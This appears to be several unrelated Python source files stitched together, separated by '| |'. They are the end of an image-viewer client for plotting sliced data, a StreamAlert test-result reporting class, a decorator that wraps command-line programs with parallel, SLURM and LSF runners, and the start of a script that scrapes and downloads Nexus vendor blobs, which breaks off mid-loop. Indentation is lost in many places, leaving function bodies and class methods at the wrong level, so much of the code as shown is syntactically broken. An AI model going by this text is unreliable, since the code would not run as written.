        return self._axes

    def check_update(self, *args):
        """
        For the MPL client, see if the view window has changed enough
        such that the images should be resampled
        """
        logging.getLogger(__name__).debug("check update")
        vw = _view_window(self._axes)
        if vw != self._view_window:
            logging.getLogger(__name__).debug("updating")
            self._update_data_plot()
            self._update_subset_plots()
            self._redraw()
            self._view_window = vw

    @requires_data
    def _update_axis_labels(self):
        labels = _axis_labels(self.display_data, self.slice)
        self._update_wcs_axes(self.display_data, self.slice)
        self._axes.set_xlabel(labels[1])
        self._axes.set_ylabel(labels[0])

    @defer_draw
    def _update_wcs_axes(self, data, slc):
        # Re-orient WCS axes to match the new slice, if supported.
        wcs = getattr(data.coords, 'wcs', None)

        if wcs is not None and hasattr(self.axes, 'reset_wcs'):
            self.axes.reset_wcs(wcs, slices=slc[::-1])

    def _redraw(self):
        self._axes.figure.canvas.draw()

    def relim(self):
        shp = _2d_shape(self.display_data.shape, self.slice)
        self._axes.set_xlim(0, shp[1])
        self._axes.set_ylim(0, shp[0])

    def _new_rgb_layer(self, layer):
        v = self._view or self._build_view()
        a = RGBImageLayerArtist(layer, self._axes, last_view=v)
        return a

    def _new_image_layer(self, layer):
        return ImageLayerArtist(layer, self._axes)

    def _new_subset_image_layer(self, layer):
        return SubsetImageLayerArtist(layer, self._axes)

    def _new_scatter_layer(self, layer):
        return ScatterLayerArtist(layer, self._axes)

    def _build_view(self):
        # Like ImageClient._build_view, but crops/downsamples to match the
        # current axes zoom so large images stay responsive.
        att = self.display_attribute
        shp = self.display_data.shape
        shp_2d = _2d_shape(shp, self.slice)
        v = extract_matched_slices(self._axes, shp_2d)
        x = slice(v[0], v[1], v[2])
        y = slice(v[3], v[4], v[5])
        slc = list(self.slice)
        slc[slc.index('x')] = x
        slc[slc.index('y')] = y
        return (att,) + tuple(slc)

    def show_crosshairs(self, x, y):
        if self._crosshairs is not None:
            self._crosshairs.remove()
        self._crosshairs, = self._axes.plot([x], [y], '+', ms=12,
                                            mfc='none', mec='#d32d26',
                                            mew=2, zorder=100)
        self._redraw()

    def clear_crosshairs(self):
        if self._crosshairs is not None:
            self._crosshairs.remove()
            self._crosshairs = None
def _2d_shape(shape, slc):
"""Return the shape of the 2D slice through a 2 or 3D image
"""
# - numpy ordering here
return shape[slc.index('y')], shape[slc.index('x')]
def _slice_axis(shape, slc):
"""
Return a 2-tuple of which axes in a dataset lie along the
x and y axes of the image
:param shape: Shape of original data. tuple of ints
:param slc: Slice through the data, tuple of ints, 'x', and 'y'
"""
return slc.index('x'), slc.index('y')
def _axis_labels(data, slc):
shape = data.shape
names = [data.get_world_component_id(i).label
for i in range(len(shape))]
return names[slc.index('y')], names[slc.index('x')]
def _view_window(ax):
""" Return a tuple describing the view window of an axes object.
The contents should not be used directly, Rather, several
return values should be compared with == to determine if the
window has been panned/zoomed
"""
ext = (ax.transAxes.transform([(1, 1)]) - ax.transAxes.transform([(0, 0)]))[0]
xlim, ylim = ax.get_xlim(), ax.get_ylim()
result = xlim[0], ylim[0], xlim[1], ylim[1], ext[0], ext[1]
logging.getLogger(__name__).debug("view window: %s", result)
return result
def _default_component(data):
"""Choose a default ComponentID to display for data
Returns PRIMARY if present
"""
cid = data.find_component_id('PRIMARY')
if cid is not None:
return cid
return data.component_ids()[0]
| |
"""
Copyright 2017-present Airbnb, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from collections import defaultdict
import textwrap
from streamalert.shared import rule
from streamalert.shared.logger import get_logger
from streamalert_cli.test.event import TestEvent
from streamalert_cli.test.format import format_green, format_red, format_underline
LOGGER = get_logger(__name__)
class TestResult(TestEvent):
    """TestResult contains information useful for tracking test results"""

    _NONE_STRING = '<None>'
    _PASS_STRING = format_green('Pass')
    _FAIL_STRING = format_red('Fail')
    # Top-level one-line templates; `# nosec` silences bandit's hardcoded-
    # password heuristic on the '{pass}' placeholder.
    _SIMPLE_TEMPLATE = '{header}:'
    _PASS_TEMPLATE = '{header}: {pass}'  # nosec
    _ERROR_TEMPLATE = '{header}: {error}'  # nosec

    # The section templates below are concatenated, formatted, then passed
    # through textwrap.dedent() in __str__; their internal indentation is
    # therefore relative to the common leading whitespace.
    _DESCRIPTION_LINE = (
        '''
        Description: {description}'''
    )
    _CLASSIFICATION_STATUS_TEMPLATE = (
        '''
        Classification: {classification_status}
            Classified Type: {classified_type}
            Expected Type: {expected_type}'''
    )
    _RULES_STATUS_TEMPLATE = (
        '''
        Rules: {rules_status}
            Triggered Rules: {triggered_rules}
            Expected Rules: {expected_rules}'''
    )
    _DISABLED_RULES_TEMPLATE = (
        '''
            Disabled Rules: {disabled_rules}'''
    )
    _PUBLISHERS_STATUS_TEMPLATE = (
        '''
        Publishers: {publishers_status}
            Errors:
        {publisher_errors}'''
    )
    _CLASSIFY_ONLY = (
        '''
        Classify Only: True'''
    )
    _ALERTS_TEMPLATE = (
        '''
        Live Alerts:
            Sent Alerts: {sent_alerts}
            Failed Alerts: {failed_alerts}'''
    )

    _DEFAULT_INDENT = 4
    def __init__(self, idx, test_event, verbose=False, with_rules=False):
        """
        Args:
            idx (int): Zero-based index of this test within the suite.
            test_event: Raw test event passed through to TestEvent.
            verbose (bool): If True, always render the expanded report.
            with_rules (bool): If True, rules engine tests were requested.
        """
        super().__init__(test_event)
        self._index = idx
        self._with_rules = with_rules
        self._verbose = verbose
        # Populated later via set_classified_result()
        self._classified_result = None
        # rule_name -> {output: bool} results of live (real output) tests
        self._live_test_results = {}
        # Populated later via set_publication_results()
        self._publication_results = {}
        # Alert objects generated by the rules engine for this event
        self.alerts = []
    def __bool__(self):
        # Truthy once a classified result has been recorded
        return bool(self._classified_result)
    def __str__(self):
        """Render the test result as a human-readable (multi-line) report.

        Passing tests render a single "Test #NN: Pass" line unless verbose
        mode is on; failing or verbose tests render every relevant section.
        """
        fmt = {
            'header': 'Test #{idx:02d}'.format(idx=self._index + 1),
        }

        if self.error:
            # A hard error short-circuits all other sections
            fmt['error'] = format_red('Error - {}'.format(self.error))
            return self._ERROR_TEMPLATE.format(**fmt)

        if self.passed and not self._verbose:
            # Simply render "Test #XYZ: Pass" if the whole test case passed
            fmt['pass'] = self._PASS_STRING
            return self._PASS_TEMPLATE.format(**fmt)

        # Otherwise, expand the entire test with verbose details
        template = self._SIMPLE_TEMPLATE + '\n' + self._DESCRIPTION_LINE
        fmt['description'] = self.description

        # First, render classification
        template += '\n' + self._CLASSIFICATION_STATUS_TEMPLATE
        fmt['classification_status'] = (
            self._PASS_STRING if self.classification_tests_passed else self._FAIL_STRING
        )
        fmt['expected_type'] = self.log
        fmt['classified_type'] = (
            self._classified_result.log_schema_type
            if self._classified else format_red(
                self._classified_result.log_schema_type
                if self else self._NONE_STRING
            )
        )

        # If it was classification-only, note it down
        if self.classify_only:
            template += self._CLASSIFY_ONLY

        # Render the result of rules engine run
        if self.rule_tests_were_run:
            template += '\n' + self._RULES_STATUS_TEMPLATE
            fmt['rules_status'] = (
                self._PASS_STRING if self.rule_tests_passed else self._FAIL_STRING
            )
            fmt['triggered_rules'] = self._format_rules(
                self._triggered_rules,
                self.expected_rules
            )
            fmt['expected_rules'] = self._format_rules(
                self.expected_rules,
                self._triggered_rules
            )
            disabled = self._disabled_rules
            if disabled:
                template += self._DISABLED_RULES_TEMPLATE
                fmt['disabled_rules'] = ', '.join(disabled)

        # Render live test results
        if self.has_live_tests:
            template += self._ALERTS_TEMPLATE
            fmt['sent_alerts'], fmt['failed_alerts'] = self._format_alert_results()

        # Render any publisher errors
        if self.publisher_tests_were_run:
            template += '\n' + self._PUBLISHERS_STATUS_TEMPLATE
            num_pass = 0
            num_total = 0
            for num_total, result in enumerate(self._publication_results, start=1):
                num_pass += 1 if result['success'] else 0
            fmt['publishers_status'] = (
                format_green('{}/{} Passed'.format(num_pass, num_total))
                if num_pass == num_total
                else format_red('{}/{} Passed'.format(num_pass, num_total))
            )
            pad = ' ' * self._DEFAULT_INDENT * 3
            fmt['publisher_errors'] = (
                format_red('\n'.join([
                    '{}{}'.format(pad, error) for error in self.publisher_errors
                ]))
                if self.publisher_errors
                else '{}{}'.format(pad, self._NONE_STRING)
            )

        return textwrap.dedent(template.format(**fmt)).rstrip() + '\n'

    __repr__ = __str__
    @property
    def index(self):
        # Zero-based index of this test within the suite
        return self._index

    @property
    def _disabled_rules(self):
        """Expected rules that are currently disabled (sorted)."""
        return sorted(set(self.trigger_rules).intersection(
            rule.Rule.disabled_rules()
        ))

    @property
    def _triggered_rules(self):
        """Names of rules that actually fired for this event."""
        return {alert.rule_name for alert in self.alerts}

    @property
    def _untriggered_rules(self):
        """Expected rules that did not fire (sorted)."""
        return sorted(self.expected_rules.difference(self._triggered_rules))

    @property
    def expected_rules(self):
        """Rules the test expects to trigger, excluding disabled ones."""
        return set(self.trigger_rules) - rule.Rule.disabled_rules()

    @property
    def classified_log(self):
        return self._classified_result

    @property
    def _unexpected_rules(self):
        """Rules that fired but were not expected (sorted)."""
        return sorted(self._triggered_rules.difference(self.expected_rules))

    @property
    def _classified(self):
        # True when a result exists and its schema type matches the expected log
        return self and self._classified_result.log_schema_type == self.log
def _format_rules(self, items, compare_set):
if not items:
return self._NONE_STRING
all_rules = set(rule.Rule.rule_names())
result = []
for value in sorted(items):
if value not in all_rules:
value = '{} (does not exist)'.format(value)
result.append(format_red(value) if value not in compare_set else value)
return ', '.join(result)
    def _format_alert_results(self):
        """Split live test results into (successes, failures) display blocks.

        Returns a 2-tuple of rendered strings: outputs that succeeded and
        outputs that failed, grouped by rule name.
        """
        failed = defaultdict(list)
        success = defaultdict(list)
        for rule_name in sorted(self._live_test_results):
            result = self._live_test_results[rule_name]
            for output, status in result.items():
                if not status:
                    failed[rule_name].append(output)
                else:
                    success[rule_name].append(output)

        return self._alert_result_block(success), self._alert_result_block(failed, True)
    def _alert_result_block(self, values, failed=False):
        """Render a rule_name -> [outputs] mapping as an indented text block.

        Args:
            values (dict): Maps rule names to lists of output descriptors.
            failed (bool): If True, each output line is rendered in red.

        Returns:
            str: '<None>' when empty, otherwise a newline-prefixed block.
        """
        result_block = []
        fmt = '{pad_char:<{pad}}{line}'
        for rule_name in sorted(values):
            result_block.append(
                fmt.format(
                    pad_char=' ',
                    pad=self._DEFAULT_INDENT * 4,
                    line='Rule: {rule_name}'.format(rule_name=format_underline(rule_name))
                )
            )

            result_block.extend(
                fmt.format(
                    pad_char=' ',
                    pad=self._DEFAULT_INDENT * 5,
                    line=format_red(value) if failed else value
                )
                for value in values[rule_name]
            )

        return self._NONE_STRING if not result_block else '\n{}'.format('\n'.join(result_block))
    @property
    def rule_tests_were_run(self):
        """Returns True if this testcase ran Rules Engine tests"""
        return not self.classify_only and self._with_rules

    @property
    def publisher_tests_were_run(self):
        """Returns True if this test ran Publisher tests for each output"""
        # NOTE: returns the (possibly empty) results collection itself, which
        # is truthy/falsy as documented
        return (
            self.rule_tests_were_run
            and not self.skip_publishers
            and self._publication_results
        )

    @property
    def classification_tests_passed(self):
        """Returns True if all classification tests passed"""
        return self._classified

    @property
    def rule_tests_passed(self):
        """Returns True if all rules engine tests passed

        Also returns False if the rules engine tests were not run
        """
        return self.rule_tests_were_run and (self._triggered_rules == self.expected_rules)
@property
def has_live_tests(self):
"""Returns True if this testcase ran any live tests"""
return self._live_test_results
@property
def live_tests_passed(self):
"""Returns True if all live tests passed
Also returns False if live tests were not run
"""
if not self.has_live_tests:
return False
for result in self._live_test_results.values():
if not all(status for status in result.values()):
return False
return True
@property
def publisher_tests_passed(self):
"""Returns True if all publisher tests were passed
Also returns False if publisher tests were not run
"""
if not self.publisher_tests_were_run:
return False
for result in self._publication_results:
if not result['success']:
return False
return True
@property
def publisher_errors(self):
    """Describe every failed publisher test as a string.

    Each entry takes the form:
        [output:descriptor]: (Error Type) Error message
    when an error was raised, or
        [output:descriptor]: failure description
    when the test merely failed. Empty when publisher tests did not run.
    """
    if not self.publisher_tests_were_run:
        return []
    errors = []
    for entry in self._publication_results:
        if entry['success']:
            continue
        if 'error' in entry:
            detail = "({}) {}".format(type(entry['error']).__name__, entry['error'])
        else:
            detail = entry['failure']
        errors.append("{}: {}".format(entry['output_descriptor'], detail))
    return errors
@property
def count_publisher_tests_passed(self):
    """Returns the number of publisher tests that passed.

    BUG FIX: ``_publication_results`` is a list of dicts (see
    ``set_publication_results`` and ``publisher_tests_passed``), so the
    previous ``.items()`` call raised AttributeError; iterate the list
    directly. The docstring also wrongly said "failed".
    """
    return sum(1 for result in self._publication_results if result['success'])
@property
def count_publisher_tests_run(self):
    """Returns the total number of publisher tests (one per publication result)."""
    return len(self._publication_results)
@property
def passed(self):
    """Overall verdict for this testcase.

    Passes only when classification succeeded and, for each optional test
    family that actually ran (rules engine, live tests, publishers), that
    family also passed.
    """
    if not self.classification_tests_passed:
        return False
    if self.rule_tests_were_run and not self.rule_tests_passed:
        return False
    if self.has_live_tests and not self.live_tests_passed:
        return False
    if self.publisher_tests_were_run and not self.publisher_tests_passed:
        return False
    return True
def set_classified_result(self, classified_result):
    """Record the first classified result, or None when nothing classified."""
    if classified_result:
        self._classified_result = classified_result[0]
    else:
        self._classified_result = None
def set_publication_results(self, publication_results):
    """Record the outcome of the publisher tests.

    Params
        publication_results (list[dict]):
            A list of dictionaries that describe the result of running publications tests.
            Each dictionary should contain the following:
            - output_descriptor: The output the test is run on
            - expectation: String describing the test: (e.g. "[$.slack] should be value")
            - error: If an ERROR was encountered, this is the error
            - failure: If the test did not pass, describe why
            - success: True if test passed. False otherwise.
    """
    self._publication_results = publication_results
def add_live_test_result(self, rule_name, result):
    """Record the live-test outcome for *rule_name*.

    *result* is a mapping whose values are truthy/falsy statuses
    (``live_tests_passed`` calls ``result.values()`` on each entry).
    """
    self._live_test_results[rule_name] = result
| |
"""
=================
Wrapping programs
=================
The ``@command`` decorator makes binding command line executables
easy to write and easy to use.
To wrap a program, write a function that takes whatever arguments
you will need to run the program as if it were on the shell.
The function should return a dictionary containing several keys:
* mandatory: ``arguments``
* optional: ``stdin``
* optional: ``return_value``.
Firstly, ``arguments`` should be a list of strings which is
the actual command and arguments to be executed (e.g. ``["touch", filename]``).
Secondly, ``stdin`` should be a value to feed the subprocess once it is launched.
Thirdly, ``return_value`` should be a value to return, or a callable
object which takes ``(stdout, stderr)`` as parameters and returns the value
that will be passed back to the user when this program is run.
You can also simply specify ``"stdout"`` to have the output of the
process returned directly.
For example, to wrap ``touch``, we write a one argument function that
takes the filename of the file to touch, and apply the ``@command``
decorator to it::
from plumbing.common import command
@command
def touch(filename):
return {"arguments": ["touch", filename],
"return_value": filename}
We can now call this function directly::
f = touch("myfile")
The value returned by touch is ``"myfile"``, the name of
the touched file.
A more complicated example would include binding the BLASTP algorithm::
from plumbing.common import command
@command
def blastp(database, sequences, **kwargs):
\"\"\"Will launch the 'blastp' algorithm using the NCBI executable.
:param database: The path to the database to blast against.
:param sequences: A fasta formated string.
:param **kwargs: Extra parameters that will be passed to the executable
For instance, you could specify "e=1e-20".
:returns: A list of top hits in blast format.
\"\"\"
return {"arguments": ["blastall", "-p", "blastp", "-d", database] +
[a for k,v in kwargs.items() for a in ('-'+k,v)],
"stdin": sequences,
"return_value": 'stdout'}
As shown above, we can now call this function directly::
hits = blastp("swissprot", open("proteins.fasta").read())
The value returned by blastp is a long string containing all the
results from the BLASTP algorithm.
Often you want to call a function, but not block when it returns
so you can run several in parallel. ``@command`` also creates a
method ``parallel`` which does this. The return value is a
Future object with a single method: ``wait()``. When you call
``wait()``, it blocks until the program finishes, then returns the
same value that you would get from calling the function directly.
So, to touch two files, and not block until both commands have
started, you would write::
a = blastp.parallel("nr", open("fasta1").read(), e=1e-20)
b = blastp.parallel("nr", open("fasta2").read(), e=1e-20)
hitsA = a.wait()
hitsB = b.wait()
The ``parallel`` method will run processes without blocking.
Other methods exists for running commands in parallel.
For example, on systems using the SLURM batch submission
system, you can run commands via batch submission by using the
``slurm`` method and optionally adding the time and account info::
p = blastp.slurm("nr", open("fasta").read(), time='1:00:00')
hits = p.wait()
On systems using the LSF batch submission system, you can run
commands via batch submission by using the ``lsf`` method::
p = blastp.lsf("nr", open("fasta").read(), queue='long')
hits = p.wait()
"""
# Built-in modules #
import subprocess, sys, time
# Variables #
# Global registry of in-flight Future objects created by the ``parallel``,
# ``slurm`` and ``lsf`` methods; drained by ``pause_for_parallel_jobs``.
# (Note: "PARRALEL" is a historical misspelling, kept for compatibility.)
PARRALEL_JOBS = []
################################################################################
def start_process(args):
    """Launch *args* as a subprocess with piped stdin, stdout and stderr.

    Raises ValueError when the executable cannot be found on the $PATH.
    """
    try:
        return subprocess.Popen(
            args,
            bufsize=-1,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            stdin=subprocess.PIPE,
        )
    except OSError:
        raise ValueError("Program '%s' does not seem to exist in your $PATH." % args[0])
################################################################################
def pause_for_parallel_jobs(update_interval=2):
    """Block until every job in PARRALEL_JOBS has finished.

    Prints a one-line status update (overwritten in place) every
    *update_interval* seconds, and clears the line before returning.
    """
    global PARRALEL_JOBS
    while True:
        still_running = [job for job in PARRALEL_JOBS if not job.finished]
        PARRALEL_JOBS = still_running
        if not still_running:
            # Erase the status line before handing control back.
            sys.stdout.write("\r\033[K")
            sys.stdout.flush()
            return
        message = "\r %i parallel jobs still running.\033[K" % len(still_running)
        sys.stdout.write(message)
        sys.stdout.flush()
        time.sleep(update_interval)
################################################################################
class CommandFailed(Exception):
    """Raised when a program wrapped with ``@command``
    exits with a non-zero status."""
    def __init__(self, args, stderr, name=None):
        parts = ["Running '%s' failed." % " ".join(args)]
        if name:
            parts.append(" The job name was: '%s'." % name)
        if stderr:
            parts.append(" The error reported is:\n\n" + stderr)
        Exception.__init__(self, "".join(parts))
################################################################################
class command(object):
    """Decorator used to wrap external programs.

    The wrapped function must return a dict with key ``arguments`` (the
    argv list to execute) and optionally ``stdin`` (data fed to the
    process) and ``return_value`` (a literal value, the string
    ``'stdout'``, or a callable taking ``(stdout, stderr)``). See the
    module docstring for examples. NOTE: this file uses Python 2 syntax
    (print statements).
    """
    def __init__(self, function):
        self.function = function
        # Preserve the wrapped function's metadata for help()/introspection.
        self.__doc__ = function.__doc__
        self.__name__ = function.__name__
    def __call__(self, *args, **kwargs):
        """Run a program locally, and block until it completes."""
        # Call the user defined function #
        cmd_dict = self.function(*args, **kwargs)
        # Arguments may be ints, paths, etc. -- stringify them for exec.
        cmd_dict['arguments'] = [str(a) for a in cmd_dict['arguments']]
        args = cmd_dict['arguments']
        # Start a process #
        proc = start_process(args)
        # Wait until completion (communicate also feeds the optional stdin) #
        try: stdout, stderr = proc.communicate(cmd_dict.get("stdin"))
        except KeyboardInterrupt as err:
            print "You aborted the process pid %i. It was: %s " % (proc.pid, args)
            raise err
        # Check for failure #
        if proc.returncode != 0: raise CommandFailed(args, stderr)
        # Return result #
        result = cmd_dict.get("return_value")
        if callable(result): return result(stdout, stderr)
        elif result == 'stdout': return stdout
        else: return result
    def parallel(self, *args, **kwargs):
        """Run a program and return a Future object."""
        # Call the user defined function #
        cmd_dict = self.function(*args, **kwargs)
        cmd_dict['arguments'] = [str(a) for a in cmd_dict['arguments']]
        # Start a process #
        proc = start_process(cmd_dict['arguments'])
        # Write to the standard in, then close it so the child sees EOF #
        if 'stdin' in cmd_dict:
            proc.stdin.write(cmd_dict["stdin"])
            proc.stdin.close()
        # The Future object takes it from here #
        future = Future(proc, cmd_dict)
        # Keep a reference so pause_for_parallel_jobs() can track it #
        PARRALEL_JOBS.append(future)
        # Hand it back to the user #
        return future
    def slurm(self, *args, **kwargs):
        """Run a program via the SLURM system and return a Future object.

        Extra keyword arguments ``time``, ``account`` and ``name`` are
        consumed here and translated to srun flags.
        """
        # Optional name (also forwarded to srun as -J below) #
        name = kwargs.get('name')
        # Define special parameters #
        special_params = (('time','-t'), ('account','-A'), ('name','-J'))
        # Compose the command #
        slurm_cmd = ['srun', '-n', '1', '-Q']
        # Get optional parameters (popped so the wrapped function never sees them) #
        for param,key in special_params:
            if param in kwargs: slurm_cmd += [key, kwargs.pop(param)]
        # Call the user defined function #
        cmd_dict = self.function(*args, **kwargs)
        cmd_dict['arguments'] = [str(a) for a in cmd_dict['arguments']]
        # Get optional keyword parameters #
        # NOTE(review): 'qos' is popped *after* the wrapped function was
        # already called, so the wrapped function still receives it in
        # kwargs -- confirm whether this is intended.
        qos = kwargs.pop('qos') if 'qos' in kwargs else None
        if qos: slurm_cmd += ['--qos='+qos]
        # Update the command #
        cmd_dict["arguments"] = slurm_cmd + cmd_dict["arguments"]
        # Start a process #
        proc = start_process(cmd_dict['arguments'])
        # Write the standard in #
        if 'stdin' in cmd_dict:
            proc.stdin.write(cmd_dict["stdin"])
            proc.stdin.close()
        # The Future object takes it from here #
        future = Future(proc, cmd_dict, name)
        # Let's keep a reference of it #
        PARRALEL_JOBS.append(future)
        # Hand it back to the user #
        return future
    def lsf(self, *args, **kwargs):
        """Run a program via the LSF system and return a Future object.

        The extra keyword argument ``queue`` is consumed here.
        NOTE(review): ``name`` is read with get() but not popped, so the
        wrapped function also receives it -- confirm this is intended.
        """
        # Optional name #
        name = kwargs.get('name')
        # Get extra optional keyword parameters #
        queue = kwargs.pop('queue') if 'queue' in kwargs else None
        # Call the user defined function #
        cmd_dict = self.function(*args, **kwargs)
        cmd_dict['arguments'] = [str(a) for a in cmd_dict['arguments']]
        # Compose the command #
        bsub_cmd = ["bsub", "-o", "/dev/null", "-e", "/dev/null", "-K", "-r"]
        if queue: bsub_cmd += ['-q', queue]
        cmd_dict["arguments"] = bsub_cmd + cmd_dict["arguments"]
        # Start a process #
        proc = start_process(cmd_dict['arguments'])
        # Write the standard in #
        if 'stdin' in cmd_dict:
            proc.stdin.write(cmd_dict["stdin"])
            proc.stdin.close()
        # The FutureLSF object takes it from here #
        future = Future(proc, cmd_dict, name)
        # Let's keep a reference of it #
        PARRALEL_JOBS.append(future)
        # Hand it back to the user #
        return future
################################################################################
class Future(object):
    """Object returned when functions decorated with ``@command``
    are executed in parallel with ``parallel()`` (and the ``slurm()`` /
    ``lsf()`` variants). Call ``wait()`` to block and retrieve the result."""
    def __init__(self, proc, cmd_dict, name=None):
        self.proc = proc          # the running subprocess.Popen instance
        self.cmd_dict = cmd_dict  # dict produced by the wrapped function
        self.name = name          # optional job name, used in error reports
    @property
    def finished(self):
        # poll() returns None while the process is still running.
        if self.proc.poll() is None: return False
        else: return True
    @property
    def return_code(self):
        # None while running, exit status once finished.
        return self.proc.poll()
    def wait(self):
        """Block until the process finishes and return its result
        (same semantics as calling the wrapped function directly)."""
        # Wait until completion #
        try: return_code = self.proc.wait()
        except KeyboardInterrupt as err:
            print "You aborted the process pid %i. It was: %s " % (self.proc.pid, self.cmd_dict["arguments"])
            raise err
        # Read result #
        stdout, stderr = self.proc.stdout.read(), self.proc.stderr.read()
        # Check for failure #
        if return_code != 0: raise CommandFailed(self.cmd_dict["arguments"], stderr, self.name)
        # Return result #
        result = self.cmd_dict.get("return_value")
        if callable(result): return result(stdout, stderr)
        elif result == 'stdout': return stdout
        else: return result
| |
#!/usr/bin/python3
"""Manage downloading of AOSP blobs.
This script scrapes the contents of the Google web page that tracks
current versions of vendor blobs for AOSP images. It then downloads
the most recent blobs for the most common development devices
into a repository where they can be picked up later on and incorporated
into an AOSP client.
More detailed background info:
Android system images built from AOSP clients can't be flashed
directly to Nexus devices without the incorporation of so-called
'vendor blobs' -- precompiled drivers or shared libraries containing
vendor-proprietary code. It is the responsibility of the developer to
select the correct blob(s) and install them into an Android repo
client once the client has been created. This process is annoying
(lots of searching, clicking, typing "yes I accept" etc) and is
vulnerable to user error. In addition, new blobs are posted every
couple of weeks. Google publishes links to vendor blobs on a public
web page:
https://developers.google.com/android/nexus/blobs-preview
While the links to the actual blobs referred to on this web page change,
the rest of the page structure stays pretty much the same, meaning that
it's not hard to write something to scrape the page, locate the blobs,
and download them (hence the creation of this script).
See also 'install-aosp-blobs.py', which installs the correct set of
blobs in a client based on a device tag (ex: N5, N9, etc)
"""
import getopt
import os
import re
import sys
from lxml import html
import requests
import script_utils as u
#......................................................................
# Where to put blobs once we've downloaded them (set by parse_args;
# falls back to $HOME/blobs when -a is not given)
flag_archive_dir = None
# What page to scrape to figure out what to download
flag_scrape_target = "https://developers.google.com/android/nexus/blobs-preview"
# Devices that we're interested in. Key is the tag we'll use to
# refer to the device; description is the raw text that we look
# for when scraping the blobs page
device_tags = {
    # "N5": "Nexus 5 (GSM/LTE) (hammerhead) binaries for Android",
    "N6": "Nexus 6 (Mobile) (shamu) binaries for Android",
    "fugu": "Nexus Player (fugu) binaries for Android",
    # "N7": "Nexus 7 (Wi-Fi) (flo) binaries for Android",
    "N9": "Nexus 9 (flounder) binaries for Android",
}
def download_blob(device, version, link):
    """Download a single blob archive for *device* at *version* from *link*.

    Files land in <archive>/<version>/<device>/; the '<archive>/cur'
    symlink is repointed at the downloaded version. Already-present files
    are skipped.
    """
    # Create <archive>/<version> and <archive>/<version>/<device> if needed.
    devdir = "%s/%d" % (flag_archive_dir, version)
    if not os.path.isdir(devdir):
        os.mkdir(devdir)
    verdir = "%s/%s/%s" % (flag_archive_dir, version, device)
    if not os.path.isdir(verdir):
        os.mkdir(verdir)
    # Download the file unless we already have it.
    base = os.path.basename(link)
    path = "%s/%s" % (verdir, base)
    if not os.path.exists(path):
        print("... downloading %s => %s" % (link, path))
        u.docmd("curl -L %s -o %s" % (link, path))
    else:
        print("... skipping %s blob %s (exists in archive already)" % (device, link))
    # Update current version link.
    # BUG FIX: use lexists, not exists -- a dangling 'cur' symlink (target
    # removed) makes os.path.exists return False, leaving the stale link in
    # place and causing the os.symlink below to fail with EEXIST.
    curlink = "%s/cur" % flag_archive_dir
    if os.path.lexists(curlink):
        try:
            os.remove(curlink)
        except OSError as err:
            u.error("unable to remove current version "
                    "link %s: %s" % (curlink, err))
    try:
        os.symlink("%d" % version, "%s/cur" % flag_archive_dir)
    except OSError as err:
        # BUG FIX: the captured error was previously dropped from the message.
        u.error("unable to update current version link %s: %s" % (curlink, err))
def postprocess(scraper):
    """Download every blob recorded by *scraper* after a successful scrape."""
    if u.verbosity_level() > 0:
        sys.stderr.write("dump of scraper state\n")
        scraper.dump()
    blobtable = scraper.blobtable()
    version = scraper.version()
    for device, rows in blobtable.items():
        # BUG FIX: idx was initialized to 0 and never advanced, so every
        # trace line reported idx=0; enumerate yields the true row index
        # (mirroring NexusBlobPageScraper.dump()).
        for idx, r in enumerate(rows):
            # r is [desc, company, link, md5, sha1]; r[2] is the download URL.
            u.verbose(1, "device=%s idx=%d blob=%s\n" % (device, idx, r[2]))
            download_blob(device, version, r[2])
def usage(msgarg):
    """Write an optional error plus the usage text, then exit(1)."""
    if msgarg:
        sys.stderr.write("error: %s\n" % msgarg)
    progname = os.path.basename(sys.argv[0])
    print("""\
usage: %s [options]
options:
-a D store downloaded blobs in archive dir D (def: /ssd/blobs)
-s T set scrape target to T (def: %s)
-d increase debug trace level
Downloads blobs from
https://developers.google.com/android/nexus/blobs-preview
and stores them in archive dir for future use.
""" % (progname, flag_scrape_target))
    sys.exit(1)
def parse_args():
    """Parse command-line flags into the module-level flag_* globals.

    Exits via usage() on bad flags; defaults the archive dir to
    $HOME/blobs and creates it when it does not already exist.
    """
    global flag_archive_dir, flag_scrape_target
    try:
        optlist, args = getopt.getopt(sys.argv[1:], "da:s:")
    except getopt.GetoptError as err:
        # unrecognized option
        usage(str(err))
    if args:
        usage("unexpected extra args")
    for opt, arg in optlist:
        if opt == "-d":
            u.increment_verbosity()
        elif opt == "-a":
            flag_archive_dir = arg
        elif opt == "-s":
            flag_scrape_target = arg
    # Use $HOME/blobs if -a not specified (comment previously said
    # aosp_blobs, which did not match the code).
    if not flag_archive_dir:
        homedir = os.getenv("HOME")
        if not homedir:
            u.error("no setting for $HOME environment variable -- cannot continue")
        flag_archive_dir = "%s/blobs" % homedir
        sys.stderr.write("... archive dir not specified, "
                         "using %s\n" % flag_archive_dir)
    # Does archive dir exist?
    if os.path.exists(flag_archive_dir):
        # Error if not a directory
        if not os.path.isdir(flag_archive_dir):
            u.error("specified archive dir %s is "
                    "not a directory" % flag_archive_dir)
    else:
        # BUG FIX: the message previously lacked a trailing newline.
        sys.stderr.write("... creating %s, since it "
                         "does not exist\n" % flag_archive_dir)
        try:
            os.mkdir(flag_archive_dir)
        except OSError as err:
            # BUG FIX: include the captured error in the report.
            u.error("unable to create archive directory %s: %s" % (flag_archive_dir, err))
    u.verbose(0, "... archive dir: '%s'" % flag_archive_dir)
    u.verbose(0, "... scrape target: '%s'" % flag_scrape_target)
class NexusBlobPageScraper(object):
    """Helper class for scraping the Google Nexus vendor blobs page."""
    def __init__(self, scrape_target, dev_tags):
        self._scrape_target = scrape_target  # URL of the page to scrape
        self._device_tags = dev_tags         # tag -> h3 text to look for
        self._blobtable = {}                 # tag -> list of row column-lists
        self._version = -1                   # blob version; -1 until scraped
    def doit(self):
        """Top level method for scraper."""
        # Suck in the web page
        page = requests.get(self._scrape_target)
        tree = html.fromstring(page.text)
        # We're interested in the portions of the page containing blob
        # tables: an <h3> of the form
        #   <h3>Nexus 7 (Mobile) (deb) binaries for Android (1856853)</h3>
        # immediately followed by a <table> whose header row is
        #   Hardware Component | Company | Download | MD5 | SHA-1
        # and whose data rows carry an <a href=...> download link in the
        # third column. We key off the h3 text, then pick up the table
        # that immediately follows it.
        for tag, device_desc in self._device_tags.items():
